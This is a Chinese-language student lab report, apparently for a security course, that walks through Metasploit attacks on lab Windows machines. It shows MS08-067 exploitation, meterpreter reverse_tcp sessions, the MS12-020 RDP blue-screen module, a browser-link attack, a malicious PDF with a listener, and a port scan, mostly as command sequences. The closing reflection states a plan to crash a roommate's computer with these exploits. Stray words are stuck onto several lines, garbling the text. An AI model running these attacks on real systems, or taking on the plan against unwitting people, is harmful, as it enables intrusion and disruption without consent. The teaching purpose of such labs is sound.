本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:html
1.1一個主動攻擊實踐(1分)shell
1.2 一個針對瀏覽器的攻擊(1分)windows
1.3 一個針對客戶端的攻擊(1分)api
1.4 成功應用任何一個輔助模塊。(0.5分)瀏覽器
(1)用本身的話解釋什麼是exploit,payload,encode.安全
關於漏洞MS08_067的原理tcp
msfconsole
進入msf控制檯
search ms08_067
查看該漏洞
use exploit/windows/smb/ms08_067_netapi
使用該漏洞
show payloads
回鏈攻擊載荷工具
set LHOST 192.168.70.131 //攻擊機的ip地址 set LPORT 5231 //攻擊的端口 set RHOST 192.168.70.140 //靶機的ip地址 set target 0 //選擇目標系統類型 exploit //進行攻擊
關閉防火牆,改變安全策略,查看445端口情況,甚至改變winxp版本,由中文版改爲英文版
很遺憾始終是隻能檢測出系統卻沒法生成有效的會話編碼
攻擊方:kali 192.168.70.131
靶機:win7 192.168.70.130spa
輸入msfconsole指令,打開控制檯;
依次輸入如下指令進行設置與攻擊:
set payload windows/x64/meterpreter/reverse_tcp //選擇攻擊載荷 set LHOST 192.168.70.131 //設置攻擊方ip set RHOST 192.168.70.130 //設置靶機ip
exploit
鏈接成功
嘗試命令查看靶機ip
攻擊機kali 192.168.70.131
靶機windows 7 192.168.70.130
用kali自帶的的掃描工具nmap 查看靶機是否開啓3389端口。(沒開就把他打開!)
掃描以後發現3389是開放的,而後啓動msfconsole, 利用裏面的模塊查看是否存在Ms12-020漏洞。
查詢模塊
set RHOST 192.168.70.130 //設置靶機地址
而後exploit
100%表示能夠攻擊
攻擊模塊
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //加載攻擊模塊 set RHOST 192.168.70.130 //設置靶機地址
而後仍是exploit
出現seems down說明靶機已經藍上了!
主機 kali 192.168.70.131
靶機 Windows XP SP3 192.168.70.141
set payload windows/meterpreter/reverse_tcp set LHOST 192.168.70.131 set LPORT 2016 set URIPATH wyhy
而後exploit
開啓監聽,而後生成網址,將這個網址在靶機打開後攻擊機就捕獲了靶機,創建會話
攻擊方:kali 192.168.70.131
靶機:winxp 192.168.70.141
輸入msfconsole指令,打開控制檯;
依次輸入如下指令進行設置
set payload windows/meterpreter/reverse_tcp //設置tcp反向鏈接 set LHOST 192.168.70.131//攻擊方IP set LPORT 5231 //攻擊方攻擊端口 set FILENAME wyhy_exp5.pdf
use exploit/multi/handler //進入監聽模塊 set payload windows/meterpreter/reverse_tcp //設置tcp反向鏈接 set LHOST 192.168.70.131 //攻擊方IP set LPORT 5231 //攻擊方攻擊端口 exploit //監聽
使用auxiliary/scanner/portscan/tcp
模塊,用來掃描靶機的TCP端口使用狀況;
執行命令use auxiliary/scanner/portscan/tcp
進入並使用模塊;
show options
查看須要設置的參數信息,設置靶機的ip爲RHOST
set PORT 1-5231
而後expolit
exploit
:英文翻譯爲利用,黑客就是利用漏洞對電腦進行攻擊,有漏洞不必定能夠利用,但能夠利用的必定有漏洞。payload
:有效載荷。一般在傳輸數據時,爲了使數據傳輸更可靠,要把原始數據分批傳輸,而且在每一批數據的頭和尾都加上必定的輔助信息,而其中的原始數據就是payloadencode
:編碼器,用來給payload進行編碼,保護payload不被發現實戰?首先咱們只能在本身的局域網內實現。對於外網,不在同一子網下的地址鎖定沒法實現就沒法實戰攻擊,我以爲這是目前最大缺憾。
此次我最喜歡的就是那個藍屏漏洞,在CSDN上逛到的覺得我是獨一無二結果……不過仍是以爲那個很好玩,起初想作這個是想搞一下正在打Apex的室友讓他感覺一下快要吃雞藍個屏,可是系統版本高了沒啥用。後續我會繼續利用更新的漏洞讓室友感覺吃不到雞的樂趣o( ̄▽ ̄)o